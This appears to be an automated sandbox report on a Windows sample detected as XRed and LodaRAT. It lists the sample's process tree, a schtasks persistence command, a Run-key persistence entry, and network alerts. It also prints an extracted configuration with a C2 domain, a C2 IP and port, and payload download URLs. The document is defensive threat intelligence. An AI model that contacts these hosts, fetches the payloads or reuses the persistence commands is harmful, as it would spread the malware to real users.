Edit tour

Windows Analysis Report
VKKDXE.exe

Overview

General Information

Sample name:	VKKDXE.exe
Analysis ID:	1582350
MD5:	31ba582dde7c48214dfc929a8c5d5662
SHA1:	39497422641176cb4b6f8828b43805cbd1258d53
SHA256:	35f873a09d5330e0c8c0e0bdabac9640e606ac7955b6e2082d9d1ca3d9880492
Tags:	exeknkbkk212user-JAMESWT_MHT
Infos:

Detection

LodaRAT, XRed

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Antivirus detection for dropped file

Found malware configuration

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected LodaRAT

Yara detected XRed

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Document contains an embedded VBA macro with suspicious strings

Document contains an embedded VBA with functions possibly related to ADO stream file operations

Document contains an embedded VBA with functions possibly related to HTTP operations

Document contains an embedded VBA with functions possibly related to WSH operations (process, registry, environment, or keystrokes)

Drops PE files to the document folder of the user

Found API chain indicative of sandbox detection

Machine Learning detection for dropped file

Machine Learning detection for sample

Sigma detected: Potentially Suspicious Malware Callback Communication

Sigma detected: Script Interpreter Execution From Suspicious Folder

Sigma detected: Suspicious Script Execution From Temp Folder

Sigma detected: WScript or CScript Dropper

Uses dynamic DNS services

Uses schtasks.exe or at.exe to add and modify task schedules

Windows Scripting host queries suspicious COM object (likely to drop second stage)

AV process strings found (often used to terminate AV products)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Checks if the current process is being debugged

Contains functionality for read data from the clipboard

Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to execute programs as a different user

Contains functionality to launch a process as a different user

Contains functionality to launch a program with higher privileges

Contains functionality to modify clipboard data

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to read the clipboard data

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality to simulate keystroke presses

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Creates a start menu entry (Start Menu\Programs\Startup)

Detected potential crypto function

Document contains an embedded VBA macro which executes code when the document is opened / closed

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

Drops files with a non-matching file extension (content does not match file extension)

Extensive use of GetProcAddress (often used to hide API calls)

Found WSH timer for Javascript or VBS script (likely evasive script)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found evasive API chain (date check)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May infect USB drives

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

OS version to string mapping found (often used in BOTs)

One or more processes crash

PE file contains executable resources (Code or Archives)

Queries the installation date of Windows

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: Startup Folder File Write

Sigma detected: Suspicious Schtasks From Env Var Folder

Sigma detected: Use Short Name Path in Command Line

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification

Sleep loop found (likely to delay execution)

Stores files to the Windows start menu directory

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Yara detected ProcessChecker

Classification

Process Tree

System is w10x64

VKKDXE.exe (PID: 7300 cmdline: "C:\Users\user\Desktop\VKKDXE.exe" MD5: 31BA582DDE7C48214DFC929A8C5D5662)

._cache_VKKDXE.exe (PID: 7412 cmdline: "C:\Users\user\Desktop\._cache_VKKDXE.exe" MD5: FE8FBB45F71518A33C161E70F6EE1037)

cmd.exe (PID: 7636 cmdline: C:\Windows\system32\cmd.exe /c schtasks /create /tn CXNFQD.exe /tr C:\Users\user\AppData\Roaming\Windata\ZTCKPI.exe /sc minute /mo 1 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 7648 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 7708 cmdline: schtasks /create /tn CXNFQD.exe /tr C:\Users\user\AppData\Roaming\Windata\ZTCKPI.exe /sc minute /mo 1 MD5: 48C2FE20575769DE916F48EF0676A965)

wscript.exe (PID: 7656 cmdline: WSCript C:\Users\user~1\AppData\Local\Temp\CXNFQD.vbs MD5: FF00E0480075B095948000BDC66E81F0)

Synaptics.exe (PID: 7492 cmdline: "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate MD5: 9DA1B61462418FA0389F2FAA306F6C1E)

WerFault.exe (PID: 9164 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7492 -s 6408 MD5: C31336C1EFC2CCB44B4326EA793040F2)

WerFault.exe (PID: 1316 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7492 -s 6408 MD5: C31336C1EFC2CCB44B4326EA793040F2)

EXCEL.EXE (PID: 7544 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding MD5: 4A871771235598812032C822E6F68F19)

splwow64.exe (PID: 6476 cmdline: C:\Windows\splwow64.exe 12288 MD5: 77DE7761B037061C7C112FD3C5B91E73)

ZTCKPI.exe (PID: 8056 cmdline: C:\Users\user\AppData\Roaming\Windata\ZTCKPI.exe MD5: FE8FBB45F71518A33C161E70F6EE1037)

ZTCKPI.exe (PID: 8220 cmdline: "C:\Users\user\AppData\Roaming\Windata\ZTCKPI.exe" MD5: FE8FBB45F71518A33C161E70F6EE1037)

Synaptics.exe (PID: 8696 cmdline: "C:\ProgramData\Synaptics\Synaptics.exe" MD5: 9DA1B61462418FA0389F2FAA306F6C1E)

ZTCKPI.exe (PID: 8760 cmdline: C:\Users\user\AppData\Roaming\Windata\ZTCKPI.exe MD5: FE8FBB45F71518A33C161E70F6EE1037)

ZTCKPI.exe (PID: 9192 cmdline: "C:\Users\user\AppData\Roaming\Windata\ZTCKPI.exe" MD5: FE8FBB45F71518A33C161E70F6EE1037)

ZTCKPI.exe (PID: 1840 cmdline: "C:\Users\user\AppData\Roaming\Windata\ZTCKPI.exe" MD5: FE8FBB45F71518A33C161E70F6EE1037)

ZTCKPI.exe (PID: 4864 cmdline: C:\Users\user\AppData\Roaming\Windata\ZTCKPI.exe MD5: FE8FBB45F71518A33C161E70F6EE1037)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Loda, LodaRAT	Loda is a previously undocumented AutoIT malware with a variety of capabilities for spying on victims. Proofpoint first observed Loda in September of 2016 and it has since grown in popularity. The name Loda is derived from a directory to which the malware author chose to write keylogger logs. It should be noted that some antivirus products currently detect Loda as Trojan.Nymeria, although the connection is not well-documented.	No Attribution	https://blog.talosintelligence.com/2020/02/loda-rat-grows-up.html https://blog.talosintelligence.com/2020/09/lodarat-update-alive-and-well.html https://blog.talosintelligence.com/2021/02/kasablanka-lodarat.html https://blog.talosintelligence.com/attributing-yorotrooper/ https://blog.talosintelligence.com/get-a-loda-this/	https://malpedia.caad.fkie.fraunhofer.de/details/win.loda

Malware Configuration

Threatname: XRed

{"C2 url": "xred.mooo.com", "Email": "xredline1@gmail.com", "Payload urls": ["http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978", "https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download", "https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=1", "http://xred.site50.net/syn/SUpdate.ini", "https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download", "https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1", "http://xred.site50.net/syn/Synaptics.rar", "https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=download", "https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1", "http://xred.site50.net/syn/SSLLibrary.dll"]}

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
VKKDXE.exe	JoeSecurity_XRed	Yara detected XRed	Joe Security
VKKDXE.exe	JoeSecurity_DelphiSystemParamCount	Detected Delphi use of System.ParamCount()	Joe Security

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_LodaRat_1	Yara detected LodaRAT	Joe Security

Dropped Files

Source	Rule	Description	Author
C:\Users\user\AppData\Local\Temp\CXNFQD.vbs	JoeSecurity_ProcessChecker	Yara detected ProcessChecker	Joe Security
C:\ProgramData\Synaptics\RCX458E.tmp	JoeSecurity_XRed	Yara detected XRed	Joe Security
C:\ProgramData\Synaptics\RCX458E.tmp	JoeSecurity_DelphiSystemParamCount	Detected Delphi use of System.ParamCount()	Joe Security
C:\Users\user\Documents\CZQKSDDMWR\~$cache1	JoeSecurity_XRed	Yara detected XRed	Joe Security
C:\Users\user\Documents\CZQKSDDMWR\~$cache1	JoeSecurity_DelphiSystemParamCount	Detected Delphi use of System.ParamCount()	Joe Security
C:\ProgramData\Synaptics\Synaptics.exe	JoeSecurity_XRed	Yara detected XRed	Joe Security
C:\ProgramData\Synaptics\Synaptics.exe	JoeSecurity_DelphiSystemParamCount	Detected Delphi use of System.ParamCount()	Joe Security
Click to see the 2 entries

Memory Dumps

Source	Rule	Description	Author
00000000.00000000.1260396228.0000000000401000.00000020.00000001.01000000.00000003.sdmp	JoeSecurity_XRed	Yara detected XRed	Joe Security
00000000.00000000.1260396228.0000000000401000.00000020.00000001.01000000.00000003.sdmp	JoeSecurity_DelphiSystemParamCount	Detected Delphi use of System.ParamCount()	Joe Security
0000000B.00000002.2529358776.0000000002946000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_ProcessChecker	Yara detected ProcessChecker	Joe Security
00000003.00000002.2538907548.00000000046D6000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_ProcessChecker	Yara detected ProcessChecker	Joe Security
0000000B.00000002.2526904349.00000000026C8000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_ProcessChecker	Yara detected ProcessChecker	Joe Security
0000000B.00000002.2526904349.00000000026E8000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_ProcessChecker	Yara detected ProcessChecker	Joe Security
Process Memory Space: VKKDXE.exe PID: 7300	JoeSecurity_XRed	Yara detected XRed	Joe Security
Process Memory Space: ._cache_VKKDXE.exe PID: 7412	JoeSecurity_ProcessChecker	Yara detected ProcessChecker	Joe Security
Process Memory Space: ._cache_VKKDXE.exe PID: 7412	JoeSecurity_LodaRAT	Yara detected LodaRAT	Joe Security
Process Memory Space: ._cache_VKKDXE.exe PID: 7412	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: wscript.exe PID: 7656	JoeSecurity_ProcessChecker	Yara detected ProcessChecker	Joe Security
Click to see the 6 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.0.VKKDXE.exe.400000.0.unpack	JoeSecurity_XRed	Yara detected XRed	Joe Security
0.0.VKKDXE.exe.400000.0.unpack	JoeSecurity_DelphiSystemParamCount	Detected Delphi use of System.ParamCount()	Joe Security

Sigma Signatures

System Summary

Sigma detected: Potentially Suspicious Malware Callback Communication

Source: Network Connection

Author: Florian Roth (Nextron Systems): Data: DestinationIp: 172.111.138.100, DestinationIsIpv6: false, DestinationPort: 5552, EventID: 3, Image: C:\Users\user\Desktop\._cache_VKKDXE.exe, Initiated: true, ProcessId: 7412, Protocol: tcp, SourceIp: 192.168.2.7, SourceIsIpv6: false, SourcePort: 49737

Sigma detected: Script Interpreter Execution From Suspicious Folder

Source: Process started

Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: WSCript C:\Users\user~1\AppData\Local\Temp\CXNFQD.vbs, CommandLine: WSCript C:\Users\user~1\AppData\Local\Temp\CXNFQD.vbs, CommandLine|base64offset|contains: Y , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\._cache_VKKDXE.exe" , ParentImage: C:\Users\user\Desktop\._cache_VKKDXE.exe, ParentProcessId: 7412, ParentProcessName: ._cache_VKKDXE.exe, ProcessCommandLine: WSCript C:\Users\user~1\AppData\Local\Temp\CXNFQD.vbs, ProcessId: 7656, ProcessName: wscript.exe

Sigma detected: Suspicious Script Execution From Temp Folder

Source: Process started

Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: WSCript C:\Users\user~1\AppData\Local\Temp\CXNFQD.vbs, CommandLine: WSCript C:\Users\user~1\AppData\Local\Temp\CXNFQD.vbs, CommandLine|base64offset|contains: Y , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\._cache_VKKDXE.exe" , ParentImage: C:\Users\user\Desktop\._cache_VKKDXE.exe, ParentProcessId: 7412, ParentProcessName: ._cache_VKKDXE.exe, ProcessCommandLine: WSCript C:\Users\user~1\AppData\Local\Temp\CXNFQD.vbs, ProcessId: 7656, ProcessName: wscript.exe

Sigma detected: WScript or CScript Dropper

Source: Process started

Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: WSCript C:\Users\user~1\AppData\Local\Temp\CXNFQD.vbs, CommandLine: WSCript C:\Users\user~1\AppData\Local\Temp\CXNFQD.vbs, CommandLine|base64offset|contains: Y , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\._cache_VKKDXE.exe" , ParentImage: C:\Users\user\Desktop\._cache_VKKDXE.exe, ParentProcessId: 7412, ParentProcessName: ._cache_VKKDXE.exe, ProcessCommandLine: WSCript C:\Users\user~1\AppData\Local\Temp\CXNFQD.vbs, ProcessId: 7656, ProcessName: wscript.exe

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\Users\user\AppData\Roaming\Windata\ZTCKPI.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\._cache_VKKDXE.exe, ProcessId: 7412, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\CXNFQD

Sigma detected: Startup Folder File Write

Source: File created

Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\Desktop\._cache_VKKDXE.exe, ProcessId: 7412, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CXNFQD.lnk

Sigma detected: Suspicious Schtasks From Env Var Folder

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: schtasks /create /tn CXNFQD.exe /tr C:\Users\user\AppData\Roaming\Windata\ZTCKPI.exe /sc minute /mo 1, CommandLine: schtasks /create /tn CXNFQD.exe /tr C:\Users\user\AppData\Roaming\Windata\ZTCKPI.exe /sc minute /mo 1, CommandLine|base64offset|contains: mj,, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c schtasks /create /tn CXNFQD.exe /tr C:\Users\user\AppData\Roaming\Windata\ZTCKPI.exe /sc minute /mo 1, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7636, ParentProcessName: cmd.exe, ProcessCommandLine: schtasks /create /tn CXNFQD.exe /tr C:\Users\user\AppData\Roaming\Windata\ZTCKPI.exe /sc minute /mo 1, ProcessId: 7708, ProcessName: schtasks.exe

Sigma detected: Use Short Name Path in Command Line

Source: Process started

Author: frack113, Nasreddine Bencherchali: Data: Command: WSCript C:\Users\user~1\AppData\Local\Temp\CXNFQD.vbs, CommandLine: WSCript C:\Users\user~1\AppData\Local\Temp\CXNFQD.vbs, CommandLine|base64offset|contains: Y , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\._cache_VKKDXE.exe" , ParentImage: C:\Users\user\Desktop\._cache_VKKDXE.exe, ParentProcessId: 7412, ParentProcessName: ._cache_VKKDXE.exe, ProcessCommandLine: WSCript C:\Users\user~1\AppData\Local\Temp\CXNFQD.vbs, ProcessId: 7656, ProcessName: wscript.exe

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Source: Process started

Author: Michael Haag: Data: Command: WSCript C:\Users\user~1\AppData\Local\Temp\CXNFQD.vbs, CommandLine: WSCript C:\Users\user~1\AppData\Local\Temp\CXNFQD.vbs, CommandLine|base64offset|contains: Y , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\._cache_VKKDXE.exe" , ParentImage: C:\Users\user\Desktop\._cache_VKKDXE.exe, ParentProcessId: 7412, ParentProcessName: ._cache_VKKDXE.exe, ProcessCommandLine: WSCript C:\Users\user~1\AppData\Local\Temp\CXNFQD.vbs, ProcessId: 7656, ProcessName: wscript.exe

Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\ProgramData\Synaptics\Synaptics.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\VKKDXE.exe, ProcessId: 7300, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Synaptics Pointing Device Driver

Sigma detected: Office Macro File Creation

Source: File created

Author: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\ProgramData\Synaptics\Synaptics.exe, ProcessId: 7492, TargetFilename: C:\Users\user~1\AppData\Local\Temp\vLLZ7oOw.xlsm

Suricata Signatures

ET MALWARE Snake Keylogger Payload Request (GET)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-30T11:41:24.811742+0100	2044887	1	A Network Trojan was detected	192.168.2.7	49707	172.217.18.110	443	TCP
2024-12-30T11:41:24.813833+0100	2044887	1	A Network Trojan was detected	192.168.2.7	49706	172.217.18.110	443	TCP
2024-12-30T11:41:25.802690+0100	2044887	1	A Network Trojan was detected	192.168.2.7	49716	172.217.18.110	443	TCP
2024-12-30T11:41:25.807241+0100	2044887	1	A Network Trojan was detected	192.168.2.7	49717	172.217.18.110	443	TCP
2024-12-30T11:41:26.795489+0100	2044887	1	A Network Trojan was detected	192.168.2.7	49727	172.217.18.110	443	TCP
2024-12-30T11:41:26.795820+0100	2044887	1	A Network Trojan was detected	192.168.2.7	49728	172.217.18.110	443	TCP
2024-12-30T11:41:28.053818+0100	2044887	1	A Network Trojan was detected	192.168.2.7	49745	172.217.18.110	443	TCP
2024-12-30T11:41:28.076708+0100	2044887	1	A Network Trojan was detected	192.168.2.7	49744	172.217.18.110	443	TCP
2024-12-30T11:41:30.021889+0100	2044887	1	A Network Trojan was detected	192.168.2.7	49768	172.217.18.110	443	TCP
2024-12-30T11:41:30.030287+0100	2044887	1	A Network Trojan was detected	192.168.2.7	49767	172.217.18.110	443	TCP
2024-12-30T11:41:31.002652+0100	2044887	1	A Network Trojan was detected	192.168.2.7	49785	172.217.18.110	443	TCP
2024-12-30T11:41:31.004194+0100	2044887	1	A Network Trojan was detected	192.168.2.7	49782	172.217.18.110	443	TCP
2024-12-30T11:41:31.972449+0100	2044887	1	A Network Trojan was detected	192.168.2.7	49792	172.217.18.110	443	TCP
2024-12-30T11:41:32.012902+0100	2044887	1	A Network Trojan was detected	192.168.2.7	49791	172.217.18.110	443	TCP
2024-12-30T11:41:32.832560+0100	2044887	1	A Network Trojan was detected	192.168.2.7	49807	172.217.18.110	443	TCP
2024-12-30T11:41:32.832600+0100	2044887	1	A Network Trojan was detected	192.168.2.7	49802	172.217.18.110	443	TCP
2024-12-30T11:41:33.986444+0100	2044887	1	A Network Trojan was detected	192.168.2.7	49818	172.217.18.110	443	TCP
2024-12-30T11:41:33.992049+0100	2044887	1	A Network Trojan was detected	192.168.2.7	49819	172.217.18.110	443	TCP
2024-12-30T11:41:34.970696+0100	2044887	1	A Network Trojan was detected	192.168.2.7	49828	172.217.18.110	443	TCP
2024-12-30T11:41:35.061571+0100	2044887	1	A Network Trojan was detected	192.168.2.7	49826	172.217.18.110	443	TCP
2024-12-30T11:41:36.092894+0100	2044887	1	A Network Trojan was detected	192.168.2.7	49838	172.217.18.110	443	TCP
2024-12-30T11:41:36.194034+0100	2044887	1	A Network Trojan was detected	192.168.2.7	49836	172.217.18.110	443	TCP

ETPRO MALWARE Loda Logger CnC Beacon

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-30T11:41:26.416068+0100	2822116	1	Malware Command and Control Activity Detected	192.168.2.7	49737	172.111.138.100	5552	TCP
2024-12-30T11:42:02.837780+0100	2822116	1	Malware Command and Control Activity Detected	192.168.2.7	50069	172.111.138.100	5552	TCP

ETPRO MALWARE Loda Logger CnC Beacon Response M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-30T11:42:45.670947+0100	2830912	1	Malware Command and Control Activity Detected	172.111.138.100	5552	192.168.2.7	50096	TCP
2024-12-30T11:43:18.226252+0100	2830912	1	Malware Command and Control Activity Detected	172.111.138.100	5552	192.168.2.7	50096	TCP

ETPRO MALWARE W32.Bloat-A Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-30T11:41:25.102136+0100	2832617	1	Malware Command and Control Activity Detected	192.168.2.7	49714	69.42.215.252	80	TCP

ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-30T11:41:11.630771+0100	2849885	1	Malware Command and Control Activity Detected	192.168.2.7	50009	172.111.138.100	5552	TCP
2024-12-30T11:41:11.630771+0100	2849885	1	Malware Command and Control Activity Detected	192.168.2.7	49737	172.111.138.100	5552	TCP
2024-12-30T11:41:11.630771+0100	2849885	1	Malware Command and Control Activity Detected	192.168.2.7	49845	172.111.138.100	5552	TCP
2024-12-30T11:41:11.630771+0100	2849885	1	Malware Command and Control Activity Detected	192.168.2.7	50069	172.111.138.100	5552	TCP
2024-12-30T11:41:11.630771+0100	2849885	1	Malware Command and Control Activity Detected	192.168.2.7	50096	172.111.138.100	5552	TCP
2024-12-30T11:41:11.630771+0100	2849885	1	Malware Command and Control Activity Detected	192.168.2.7	49945	172.111.138.100	5552	TCP
2024-12-30T11:41:26.416068+0100	2849885	1	Malware Command and Control Activity Detected	192.168.2.7	49737	172.111.138.100	5552	TCP
2024-12-30T11:41:35.431094+0100	2849885	1	Malware Command and Control Activity Detected	192.168.2.7	49845	172.111.138.100	5552	TCP
2024-12-30T11:41:44.469306+0100	2849885	1	Malware Command and Control Activity Detected	192.168.2.7	49945	172.111.138.100	5552	TCP
2024-12-30T11:41:53.742169+0100	2849885	1	Malware Command and Control Activity Detected	192.168.2.7	50009	172.111.138.100	5552	TCP
2024-12-30T11:42:02.837780+0100	2849885	1	Malware Command and Control Activity Detected	192.168.2.7	50069	172.111.138.100	5552	TCP
2024-12-30T11:42:11.886295+0100	2849885	1	Malware Command and Control Activity Detected	192.168.2.7	50096	172.111.138.100	5552	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: VKKDXE.exe	Avira: detected
Source: VKKDXE.exe	Avira: detected

Antivirus detection for URL or domain

Source: http://xred.site50.net/syn/SSLLibrary.dl8	Avira URL Cloud: Label: malware
Source: http://xred.site50.net/syn/SUpdate.ini07	Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Source: C:\ProgramData\Synaptics\RCX458E.tmp	Avira: detection malicious, Label: TR/Dldr.Agent.SH
Source: C:\ProgramData\Synaptics\RCX458E.tmp	Avira: detection malicious, Label: W2000M/Dldr.Agent.17651006
Source: C:\ProgramData\Synaptics\Synaptics.exe	Avira: detection malicious, Label: TR/Dldr.Agent.SH
Source: C:\ProgramData\Synaptics\Synaptics.exe	Avira: detection malicious, Label: W2000M/Dldr.Agent.17651006
Source: C:\Users\user\AppData\Local\Temp\CXNFQD.vbs	Avira: detection malicious, Label: VBS/Runner.VPJI
Source: C:\Users\user\Documents\CZQKSDDMWR\~$cache1	Avira: detection malicious, Label: TR/Dldr.Agent.SH
Source: C:\Users\user\Documents\CZQKSDDMWR\~$cache1	Avira: detection malicious, Label: W2000M/Dldr.Agent.17651006

Found malware configuration

Source: VKKDXE.exe

Malware Configuration Extractor: XRed {"C2 url": "xred.mooo.com", "Email": "xredline1@gmail.com", "Payload urls": ["http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978", "https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download", "https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=1", "http://xred.site50.net/syn/SUpdate.ini", "https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download", "https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1", "http://xred.site50.net/syn/Synaptics.rar", "https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=download", "https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1", "http://xred.site50.net/syn/SSLLibrary.dll"]}

Multi AV Scanner detection for dropped file

Source: C:\ProgramData\Synaptics\Synaptics.exe	ReversingLabs: Detection: 92%
Source: C:\Users\user\AppData\Roaming\Windata\ZTCKPI.exe	ReversingLabs: Detection: 52%
Source: C:\Users\user\Desktop\._cache_VKKDXE.exe	ReversingLabs: Detection: 52%

Multi AV Scanner detection for submitted file

Source: VKKDXE.exe	Virustotal: Detection: 85%			Perma Link
Source: VKKDXE.exe	ReversingLabs: Detection: 92%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 92.6% probability

Machine Learning detection for dropped file

Source: C:\ProgramData\Synaptics\RCX458E.tmp	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\Windata\ZTCKPI.exe	Joe Sandbox ML: detected
Source: C:\ProgramData\Synaptics\Synaptics.exe	Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\._cache_VKKDXE.exe	Joe Sandbox ML: detected
Source: C:\Users\user\Documents\CZQKSDDMWR\~$cache1	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: VKKDXE.exe

Joe Sandbox ML: detected

Source: VKKDXE.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE

File opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dll

Jump to behavior

Source: unknown	HTTPS traffic detected: 172.217.18.110:443 -> 192.168.2.7:49707 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.217.18.110:443 -> 192.168.2.7:49706 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.185.193:443 -> 192.168.2.7:49718 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.185.193:443 -> 192.168.2.7:49719 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.217.18.110:443 -> 192.168.2.7:49767 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.217.18.110:443 -> 192.168.2.7:49768 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.185.193:443 -> 192.168.2.7:49783 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.217.18.110:443 -> 192.168.2.7:49782 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.217.18.110:443 -> 192.168.2.7:49785 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.185.193:443 -> 192.168.2.7:49784 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.217.18.110:443 -> 192.168.2.7:49826 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.185.193:443 -> 192.168.2.7:49827 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.217.18.110:443 -> 192.168.2.7:49828 version: TLS 1.2
